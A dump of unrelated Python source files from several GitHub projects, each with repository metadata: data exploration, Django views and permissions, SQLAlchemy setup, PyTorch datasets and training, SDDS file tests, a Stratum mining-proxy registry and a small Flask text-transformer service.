import matplotlib.pyplot as plt
sns.set(color_codes=True)
# Import pandas to manage data set
import pandas as pd
# Import NumPy for all mathematics operations on numerical data
import numpy as np
# Let's load the pre-processed version of data set
file_name = 'bank_data_test.csv'
# Load into a variable using pandas read_csv
data = pd.read_csv(file_name, delimiter=',')
# Let's verify the size of data set
print('Number of Instances: %d\nNumber of attributes: %d'%(data.shape[0],data.shape[1]))
'''
Number of Instances: 41188
Number of attributes: 21
'''
# Let's see a brief summary of some variables
print(data.describe()[['age','duration','campaign','pdays']])
'''
age duration campaign pdays
count 41188.00000 41188.000000 41188.000000 41188.000000
mean 40.02406 258.285010 2.567593 962.475454
std 10.42125 259.279249 2.770014 186.910907
min 17.00000 0.000000 1.000000 0.000000
25% 32.00000 102.000000 1.000000 999.000000
50% 38.00000 180.000000 2.000000 999.000000
75% 47.00000 319.000000 3.000000 999.000000
max 98.00000 4918.000000 56.000000 999.000000
'''
# Let's extract the output variable using it's column name
y = data.y
# We will shuffle the data set before visualization
data = data.reindex(np.random.permutation(data.index))
# Here we will plot it, and count instances for different class
ax = sns.countplot(y,label="Count")
No, Yes= y.value_counts()
print('Number of to be subscriber: ',Yes)
print('Number of not to be subscriber : ',No)
'''
Number of to be subscriber: 36548
Number of not to be subscriber : 4640
'''
# Here show the created plots
plt.show()
# We will create 4 distribution plots
f, axes = plt.subplots(nrows=2,ncols=2, figsize=(15, 6))
# Monthly marketing activity
sns.distplot(data['month_integer'], kde=False, color="#ff3300", ax=axes[0][0]).set_title('Months of Marketing Activity Distribution')
axes[0][0].set_ylabel('Potential Clients Count')
axes[0][0].set_xlabel('Months')
# Potential subscriber on Age basis
sns.distplot(data['age'], kde=False, color="#3366ff", ax=axes[0][1]).set_title('Age of Potentical Clients Distribution')
axes[0][1].set_ylabel('Potential Clients Count')
axes[0][1].set_xlabel('Age')
# Potential subscriber on Job basis
sns.distplot(data['campaign'], kde=False, color="#546E7A", ax=axes[1][0]).set_title('Calls Received in the Marketing Campaign')
axes[1][0].set_ylabel('Potential Clients Count')
axes[1][0].set_xlabel('Campaign')
# Jobs
sns.distplot(data['job'], kde=False, color="#33ff66", ax=axes[1][1]).set_title('Potential clients on Job basis')
axes[1][1].set_ylabel('Potential Clients Count')
axes[1][1].set_xlabel('Job Type')
#Show all created plots
plt.show()
# We will first remove output variable from data
x = data
# Store output variable
y = data.y
# Now let's plot correlation between all the features
# Define figure size
f,ax = plt.subplots(figsize=(15, 15))
# Create correlation plot using seaborn
sns.heatmap(x.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax)
corr = x.corr()
# plot the correlations
plt.show()
# We will drop highly correlated features
drop_list = ['emp.var.rate','nr.employed','cons.price.idx','euribor3m','previous']
#Let's remove the redundant features
data = x.drop(drop_list,axis = 1)
print(data.columns)
'''
Index(['age', 'duration', 'campaign', 'pdays', 'cons.conf.idx', 'job',
'marital', 'education', 'default', 'housing', 'loan', 'contact',
'day_of_week', 'poutcome', 'y', 'month_integer'],
dtype='object')
'''
data.to_csv('bank_data_feat_select_test.csv')
| 3.71875
| 4
|
pdsensorvis/sensors/migrations/0004_auto_20190925_0809.py
|
mickeykkim/masters-project-sphere
| 2
|
12778039
|
# Generated by Django 2.2.2 on 2019-09-25 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sensors', '0003_auto_20190924_2227'),
]
operations = [
migrations.AlterField(
model_name='cameradata',
name='filename',
field=models.FileField(help_text='Camera video file', upload_to='camera/'),
),
migrations.AlterField(
model_name='cameradata',
name='framerate',
field=models.CharField(choices=[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25), ('NTSC', 29.97), ('Web', 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), ('High', 60)], default='Film', help_text='Video framerate', max_length=9),
),
migrations.AlterField(
model_name='wearabledata',
name='filename',
field=models.FileField(help_text='Wearable data file', upload_to='wearable/'),
),
]
| 1.84375
| 2
|
helpingnetwork/organization/views.py
|
neopentane/Techathon_19
| 0
|
12778040
|
from django.shortcuts import render,redirect
from .forms import OrganizationRegisterForm,CreateEventForm,AddImageForm,AddOrgImage
from .models import Organization,OrganizationImages
from django.contrib.auth.models import User
from django.contrib import messages
from evelist.models import Event,EventImages
from volunteer.models import City,Volunteer
from django.db.models import F
# Create your views here.
def signup(request):
if request.method == 'POST':
form = OrganizationRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
o_name = form.cleaned_data.get('name')
o_vision= form.cleaned_data.get('vision')
o_mission= form.cleaned_data.get('mission')
o_link=form.cleaned_data.get('link')
t_user=User.objects.filter(username=username).first()
p=Organization(user=t_user,name=o_name,vision=o_vision,mission=o_mission,link=o_link)
p.save()
messages.success(request, f'Account created for {username}!')
return redirect('register')
else:
form = OrganizationRegisterForm()
return render(request, 'organization/signup.html', {'form': form})
def cenv(request):
if request.method == 'POST':
form1=CreateEventForm(request.POST,request.FILES)
if form1.is_valid():
new_event=form1.save(commit=False)
new_event.organizer=request.user.organization
new_event.save()
return redirect('add_img')
else:
form1=CreateEventForm()
return render(request, 'organization/cenv.html',{'form': form1})
def aenv(request):
c_organization=request.user.organization
allevents=Event.objects.filter(organizer=c_organization)
context={
"events":allevents
}
return render(request, 'organization/aenv.html',context)
def changep(request):
if request.method == 'POST':
form2=AddOrgImage(request.POST,request.FILES)
if form2.is_valid():
new_org=form2.save(commit=False)
new_org.organization=request.user.organization
new_org.save()
return redirect('change_profile')
else:
form2=AddOrgImage()
return render(request, 'organization/changep.html',{'form': form2})
def a_image(request):
if request.method == 'POST':
form2=AddImageForm(request.POST,request.FILES)
if form2.is_valid():
form2.save()
return redirect('add_img')
else:
form2=AddImageForm()
return render(request, 'organization/a_image.html',{'form': form2})
def printo(request):
if request.method == 'GET':
o_org=request.GET.get('org')
org=Organization.objects.filter(name=o_org).first()
images=OrganizationImages.objects.filter(organization=org)
context={
"name":org.name,
"vision":org.vision,
"mission":org.mission,
"link":org.link,
"img":images,
}
return render(request, 'organization/orgview.html',context)
def v_name(request):
if request.method == 'GET':
event=request.GET.get('event')
x=Event.objects.get(name=event).volunteers.all()
context={
'volunname':x,
}
return render(request,'organization/vname.html',context)
def upvote(request):
if request.method == 'GET':
volun=request.GET.get('volunteer')
c_user=User.objects.filter(username=volun).first()
c_vol=Volunteer.objects.filter(user=c_user).update(upvote=F('upvote')+1)
messages.success(request, f'successfully upvoted for {c_user}!')
return redirect('all_event')
| 1.953125
| 2
|
mkt/comm/authorization.py
|
clouserw/zamboni
| 0
|
12778041
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import BasePermission
from rest_framework.exceptions import PermissionDenied
from mkt.comm.models import (CommunicationNote, CommunicationThread,
user_has_perm_note, user_has_perm_thread)
class ThreadPermission(BasePermission):
"""
Permission wrapper for checking if the authenticated user has the
permission to view the thread.
"""
def has_permission(self, request, view):
# Let `has_object_permission` handle the permissions when we retrieve
# an object.
if view.action == 'retrieve':
return True
if not request.user.is_authenticated():
raise PermissionDenied()
return True
def has_object_permission(self, request, view, obj):
"""
Make sure we give correct permissions to read/write the thread.
"""
if not request.user.is_authenticated() or obj.read_permission_public:
return obj.read_permission_public
return user_has_perm_thread(obj, request.user)
class NotePermission(ThreadPermission):
def has_permission(self, request, view):
thread_id = view.kwargs.get('thread_id')
if not thread_id and view.kwargs.get('note_id'):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
thread_id = note.thread_id
# We save the thread in the view object so we can use it later.
view.comm_thread = get_object_or_404(
CommunicationThread, id=thread_id)
return ThreadPermission.has_object_permission(
self, request, view, view.comm_thread)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
return user_has_perm_note(obj, request.user)
class AttachmentPermission(NotePermission):
def has_permission(self, request, view):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
class EmailCreationPermission(object):
"""Permit if client's IP address is allowed."""
def has_permission(self, request, view):
auth_token = request.META.get('HTTP_POSTFIX_AUTH_TOKEN')
if auth_token and auth_token not in settings.POSTFIX_AUTH_TOKEN:
return False
remote_ip = request.META.get('REMOTE_ADDR')
return remote_ip and (
remote_ip in settings.ALLOWED_CLIENTS_EMAIL_API)
| 2.1875
| 2
|
quiz_bot/db/base.py
|
livestreamx/quiz-bot
| 1
|
12778042
|
<reponame>livestreamx/quiz-bot
from typing import Type
import sqlalchemy as sa
import sqlalchemy.orm as so
from sqlalchemy import MetaData
from sqlalchemy.ext.declarative import as_declarative, declared_attr
metadata = MetaData()
@as_declarative(metadata=metadata)
class Base:
@declared_attr
def __tablename__(cls) -> str:
return cls.__name__.lower() # type: ignore
class PrimaryKeyMixin:
id = sa.Column(sa.Integer, primary_key=True)
created_at = sa.Column(sa.DateTime(timezone=True), nullable=True, server_default=sa.func.now())
def _get_query_cls(mapper: Type[Base], session: so.Session) -> so.Query:
if mapper:
m = mapper
if isinstance(m, tuple):
m = mapper[0]
if isinstance(m, so.Mapper):
m = m.entity
try:
return m.__query_cls__(mapper, session) # type: ignore
except AttributeError:
pass
return so.Query(mapper, session)
Session = so.sessionmaker(query_cls=_get_query_cls)
current_session = so.scoped_session(Session)
| 2.140625
| 2
|
datasets/dataset.py
|
levtelyatnikov/graph_edge_generation
| 0
|
12778043
|
<filename>datasets/dataset.py
from logging import raiseExceptions
import sys
import numpy as np
import torch
import pandas as pd
import torch_cluster
from omegaconf.dictconfig import DictConfig
from sklearn.model_selection import train_test_split
from torch_geometric.data import Dataset, Data
from datasets.synthetic_graph_generator import GraphGenerator
from datasets.preprocess_dataset import upload_data
from sklearn.datasets import load_breast_cancer, load_digits, load_boston, load_iris, load_diabetes, load_wine
from ml_flow.ml_pipline import ml_flow
class CustomDataset(Dataset):
"""Dataset example"""
def __init__(self, split, cfg: DictConfig):
super().__init__(root='None', transform=None, pre_transform=None, pre_filter=None)
"""Initialize
cfg:
:data_dir: data directory
:transforms: TransformObject Class which is defined in the transformfactory.py file
:target_transforms: TransformLabel Class which is defined in the transformfactory.py file
:split: train/val split
:val_size: validation size
:seed: seed
"""
self.cfg = cfg
self.split = split
self.graph_size = cfg.graph_size
self.val_size = cfg.val_size
self.seed = cfg.data_seed
self.n_batches = cfg.n_batches
self.setup()
def setup(self):
# Upload data
self.features, self.labels = upload_data(self.cfg.dataset_name)
assert self.features.shape[0]>0 and self.labels.shape[0]>0
# Obtain train test split
self.features, self.labels = self.train_test_split()
print(f'{self.split} set shape', self.features.shape)
# Get edges_index if needed
self.edge_index = self.get_graph()
def get_graph(self,):
gg = GraphGenerator(self.features, self.labels, self.cfg)
return gg.process()
def train_test_split(self,):
# Split data
X_train, X_val, y_train, y_val = train_test_split(self.features, self.labels,
test_size=self.val_size,
random_state=self.seed)
self.f1_svm, self.acc_svm, self.f1_lin, self.acc_lin = ml_flow(X_train, X_val, y_train, y_val)
if self.split == "train":
features = X_train
labels = y_train
elif self.split == "val":
self.graph_size = 'None'
features = X_val
labels =y_val
else:
print("Specify dataset split correctly", file=sys.stderr)
self.idxs = np.arange(features.shape[0])
return features, labels
def get(self, idx):
"""Return image and label"""
if self.graph_size == "None":
idxs = self.idxs
else:
idxs = np.random.choice(self.idxs, size=self.graph_size)
features = self.features[idxs]
label = self.labels[idxs]
data = Data(x=features, y=label)
if self.cfg.precompute_graph != 'None':
data.edge_index = self.edge_index
return data
def len(self):
return self.n_batches
| 2.640625
| 3
|
tests/test_sdds_write.py
|
radiasoft/rsbeams
| 3
|
12778044
|
<gh_stars>1-10
import unittest
from rsbeams.rsdata.SDDS import writeSDDS, readSDDS
from subprocess import Popen, PIPE
import numpy as np
# Tests that use SDDS Tools Distribution
def read_file(filename, par=None, col=None):
call1 = Popen('sddscheck {}'.format(filename), shell=True, stdout=PIPE, stderr=PIPE)
check, err = call1.communicate()
if err:
return None, None, None
else:
check = check.decode('utf-8')
if par:
call2 = Popen('sdds2stream -par={} {}'.format(par, filename), shell=True, stdout=PIPE, stderr=PIPE)
par, err = call2.communicate()
if err:
return None, None, None
else:
par = par.decode('utf-8')
if col:
call2 = Popen('sdds2stream -col={} {}'.format(col, filename), shell=True, stdout=PIPE, stderr=PIPE)
col, err = call2.communicate()
if err:
return None, None, None
else:
col = col.decode('utf-8')
return check, par, col
class TestWriteBinary(unittest.TestCase):
def setUp(self):
test1 = writeSDDS('file1.sdds')
test1.create_parameter('par1', 2342.452, 'double')
test1.create_parameter('par2', 42, 'long')
test1.create_column('col1', np.array([1.23892e-3, 52452.2]).ravel(), 'double')
test1.create_column('col2', np.array([135.252, 52452.2e4]).ravel(), 'double', colUnits='m', colSymbol='&n',
colDescription="A test description")
test1.save_sdds('file1.sdds', 'binary')
self.status, self.par1, self.col1 = read_file('file1.sdds', par='par1', col='col1')
_, self.par2, self.col2 = read_file('file1.sdds', par='par2', col='col2')
def test_status_one(self):
self.assertEqual(self.status, 'ok\n')
def test_parameter_one(self):
self.assertAlmostEqual(float(self.par1), 2342.452, delta=1e8)
def test_parameter_two(self):
self.assertEqual(float(self.par2), 42)
class TestWriteAscii(unittest.TestCase):
def setUp(self):
test1 = writeSDDS('file1.sdds')
test1.create_parameter('par1', 2342.452, 'double')
test1.create_parameter('par2', 42, 'long')
test1.create_column('col1', np.array([1.23892e-3, 52452.2]).ravel(), 'double')
test1.create_column('col2', np.array([135.252, 52452.2e4]).ravel(), 'double', colUnits='m', colSymbol='&n',
colDescription="A test description")
test1.save_sdds('file1.sdds', 'ascii')
self.status, self.par1, self.col1 = read_file('file1.sdds', par='par1', col='col1')
_, self.par2, self.col2 = read_file('file1.sdds', par='par2', col='col2')
def test_status_one(self):
self.assertEqual(self.status, 'ok\n')
def test_parameter_one(self):
self.assertAlmostEqual(float(self.par1), 2342.452, delta=1e-8)
def test_parameter_two(self):
self.assertEqual(float(self.par2), 42)
# Test for binary string write out in columns
# class TestStringWriteBinary(unittest.TestCase):
#
# def setUp(self):
# test1 = writeSDDS('file1.sdds')
# test1.create_column('col1', [7, "Chicago".encode(), 8, "New York".encode()], 'string')
# test1.save_sdds('file1.sdds', 'binary')
#
# self.status, _, self.col1 = read_file('file1.sdds', col='col1')
#
# def test_status_one(self):
# self.assertEqual(self.status, 'ok\n')
if __name__ == '__main__':
unittest.main()
| 2.203125
| 2
|
Task2B.py
|
butanone/flooddefense
| 0
|
12778045
|
<filename>Task2B.py
from floodsystem import station
from floodsystem import flood
from floodsystem.stationdata import build_station_list
from floodsystem import stationdata
def run():
"""Requirements for Task 2B"""
stations = build_station_list()
stationdata.update_water_levels(stations)
stations_over_threshold = flood.stations_level_over_threshold(stations, 0.8)
for station in stations_over_threshold:
print(station[0].name, station[1])
if __name__ == "__main__":
print("*** Task 2B: CUED Part IA Flood Warning System ***")
run()
| 2.734375
| 3
|
marginTrading/tests/test_spam/test_github_api.py
|
sambiase/pycrypto
| 3
|
12778046
|
import pytest as pytest
from unittest.mock import Mock
from marginTrading import github_api
@pytest.fixture
def avatar_url(mocker):
resp_mock = Mock()
url = 'https://avatars.githubusercontent.com/u/78605825?v=4'
resp_mock.json.return_value = {'login': 'sambiase', 'id': 78605825, 'node_id': 'MDQ6VXNlcjc4NjA1ODI1',
'avatar_url': url}
get_mock = mocker.patch('marginTrading.github_api.requests.get')
get_mock.return_value = resp_mock
return url
def teste_buscar_avatar(avatar_url):
url = github_api.buscar_avatar('sambiase')
assert avatar_url == url
def teste_buscar_avatar_integracao():
url = github_api.buscar_avatar('sambiase')
assert 'https://avatars.githubusercontent.com/u/78605825?v=4' == url
| 2.4375
| 2
|
visualization.py
|
karanrampal/template_project
| 0
|
12778047
|
<reponame>karanrampal/template_project<filename>visualization.py
#!/usr/bin/env python3
"""Visualize the model"""
import argparse
import logging
import os
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
import utils
from model.net import Net
import model.data_loader as d_l
def args_parser():
"""Parse commadn line arguments
"""
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir',
default='../datasets/',
help="Directory containing the dataset")
parser.add_argument('--model_dir',
default='experiments/base_model',
help="Directory containing params.json")
parser.add_argument('--restore_file',
default='best',
help="name of the file in --model_dir containing weights to load")
return parser.parse_args()
def visualize(model, dataloader, params, writer, num_proj=100):
"""Evaluate the model visualize the results.
Args:
model: (torch.nn.Module) the neural network
dataloader: (DataLoader) a torch.utils.data.DataLoader object that fetches data
params: (Params) hyperparameters
writer: (SummaryWriter) Summary writer for tensorboard
num_proj: (int) Number of images to project
"""
# put model in evaluation mode
model.eval()
class_probs = []
embeddings = []
inputs = []
labels = []
with torch.no_grad():
for _, input_data in enumerate(dataloader):
inp_data, label = input_data
# move data to GPU if possible
if params.cuda:
inp_data = inp_data.to(params.device)
label = label.to(params.device)
# compute model output
embed, output = model(inp_data)
# move to cpu
for x in [output, embed, inp_data, label]:
x = x.cpu()
class_probs.append(output)
embeddings.append(embed)
inputs.append(inp_data)
labels.append(label)
logging.info("- done.")
class_probs = torch.exp(torch.cat(class_probs))
_, class_preds = torch.max(class_probs, 1)
embeddings = torch.cat(embeddings)
labels = torch.cat(labels)
inputs = torch.cat(inputs)
# Add PR curve to tensorboard
logging.info("Add Precision-Recall in tensorboard...")
for i in range(params.num_classes):
tensorboard_probs = class_probs[:, i]
tensorboard_preds = class_preds == i
writer.add_pr_curve(str(i),
tensorboard_preds,
tensorboard_probs)
# Add random samples to the projector on tensorboard
logging.info("Add Projections in tensorboard...")
perm = np.random.randint(0, len(embeddings), num_proj)
labels = labels[perm]
class_labels = labels.tolist()
writer.add_embedding(mat=embeddings[perm, ...],
metadata=class_labels,
label_img=inputs[perm, ...])
def main():
"""Main function
"""
# Load the parameters
args = args_parser()
json_path = os.path.join(args.model_dir, 'params.json')
assert os.path.isfile(json_path), "No json config file found at {}".format(json_path)
params = utils.Params(json_path)
# Create summary writer for use with tensorboard
writer = SummaryWriter(os.path.join(args.model_dir, 'runs', 'visualize'))
# use GPU if available
params.cuda = torch.cuda.is_available() # use GPU is available
# Set the random seed for reproducible experiments
torch.manual_seed(230)
if params.cuda:
torch.cuda.manual_seed(230)
params.device = "cuda:0"
else:
params.device = "cpu"
# Set the logger
utils.set_logger(os.path.join(args.model_dir, 'visualize.log'))
logging.info("Loading the dataset...")
# fetch dataloaders
dataloaders = d_l.get_dataloader(['test'], args.data_dir, params)
test_dl = dataloaders['test']
logging.info("- done.")
# Define the model
model = Net(params)
if params.cuda:
model = model.to(params.device)
logging.info("Starting evaluation")
# Reload weights from the saved file
utils.load_checkpoint(os.path.join(args.model_dir, args.restore_file + '.pth.tar'), model)
# Visuzlize
visualize(model, test_dl, params, writer)
writer.close()
if __name__ == '__main__':
main()
| 2.546875
| 3
|
hf/mining_libs/worker_registry.py
|
HashFast/hashfast-tools
| 1
|
12778048
|
<filename>hf/mining_libs/worker_registry.py
#!/usr/bin/env python
# Copyright (c) 2014, HashFast Technologies LLC
# All rights reserved.
#
# based heavily upon:
# Stratum mining proxy (https://github.com/slush0/stratum-mining-proxy)
# Copyright (C) 2012 <NAME> <<EMAIL>>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of HashFast Technologies LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL HASHFAST TECHNOLOGIES LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import time
import stratum.logger
log = stratum.logger.get_logger('proxy')
class WorkerRegistry(object):
def __init__(self, f):
self.f = f # Factory of Stratum client
self.clear_authorizations()
def clear_authorizations(self):
self.authorized = []
self.unauthorized = []
self.last_failure = 0
def _on_authorized(self, result, worker_name):
if result == True:
self.authorized.append(worker_name)
else:
self.unauthorized.append(worker_name)
return result
def _on_failure(self, failure, worker_name):
log.exception("Cannot authorize worker '%s'" % worker_name)
self.last_failure = time.time()
def authorize(self, worker_name, password):
if worker_name in self.authorized:
return True
if worker_name in self.unauthorized and time.time() - self.last_failure < 60:
# Prevent flooding of mining.authorize() requests
log.warning("Authentication of worker '%s' with password '%s' failed, next attempt in few seconds..." % \
(worker_name, password))
return False
d = self.f.rpc('mining.authorize', [worker_name, password])
d.addCallback(self._on_authorized, worker_name)
d.addErrback(self._on_failure, worker_name)
return d
def is_authorized(self, worker_name):
return (worker_name in self.authorized)
def is_unauthorized(self, worker_name):
return (worker_name in self.unauthorized)
| 1.429688
| 1
|
app.py
|
CrossLangNV/text_transformer
| 0
|
12778049
|
<reponame>CrossLangNV/text_transformer
import os
import json
import subprocess
import flask
app = flask.Flask(__name__)
TMP_FILE_FOR_INPUT = 'input.txt'
TMP_FILE_FOR_OUTPUT = 'output.txt'
@app.route('/')
def home():
return 'COMPRISE Text Transformer Service'
@app.route('/transform', methods=['POST'])
def transform_text():
params = json.loads(flask.request.args.items().__next__()[0])
with open(TMP_FILE_FOR_INPUT, mode='w') as f:
text = flask.request.data.decode()
f.write(text)
cmd = ["python", "transform.py"]
for key, value in params.items():
cmd.extend(['-' + key, str(value)])
cmd.extend([os.path.abspath(TMP_FILE_FOR_INPUT), os.path.abspath(TMP_FILE_FOR_OUTPUT)])
subprocess.run(cmd, cwd='./transformer')
with open(TMP_FILE_FOR_OUTPUT, mode='r') as f:
result = ''.join(f.readlines())
return result
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
| 2.328125
| 2
|
examples/MNIST_easytorch_CNN.py
|
sraashis/quenn
| 0
|
12778050
|
<filename>examples/MNIST_easytorch_CNN.py<gh_stars>0
import torch
import torch.nn.functional as F
from torchvision import datasets, transforms
from examples.models import MNISTNet
from easytorch import EasyTorch, ETTrainer, ConfusionMatrix, ETMeter, AUCROCMetrics
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
class MNISTTrainer(ETTrainer):
def _init_nn_model(self):
self.nn['model'] = MNISTNet()
def iteration(self, batch):
inputs = batch[0].to(self.device['gpu']).float()
labels = batch[1].to(self.device['gpu']).long()
out = self.nn['model'](inputs)
loss = F.nll_loss(out, labels)
_, pred = torch.max(out, 1)
meter = self.new_meter()
meter.averages.add(loss.item(), len(inputs))
meter.averages.add(loss.item() * 0.3, len(inputs), 1)
meter.metrics['cmf'].add(pred, labels.float())
meter.metrics['auc'].add(pred, labels.float())
return {'loss': loss, 'meter': meter, 'predictions': pred}
def init_experiment_cache(self):
self.cache['log_header'] = 'Loss|Accuracy,F1,Precision,Recall'
self.cache.update(monitor_metric='f1', metric_direction='maximize')
def new_meter(self):
return ETMeter(
num_averages=2,
cmf=ConfusionMatrix(num_classes=10),
auc=AUCROCMetrics()
)
train_dataset = datasets.MNIST('../data', train=True, download=True,
transform=transform)
val_dataset = datasets.MNIST('../data', train=False,
transform=transform)
dataloader_args = {'train': {'dataset': train_dataset},
'validation': {'dataset': val_dataset}}
runner = EasyTorch(phase='train', distributed_validation=True,
batch_size=512, epochs=2,
dataloader_args=dataloader_args)
if __name__ == "__main__":
runner.run(MNISTTrainer)
| 2.515625
| 3
|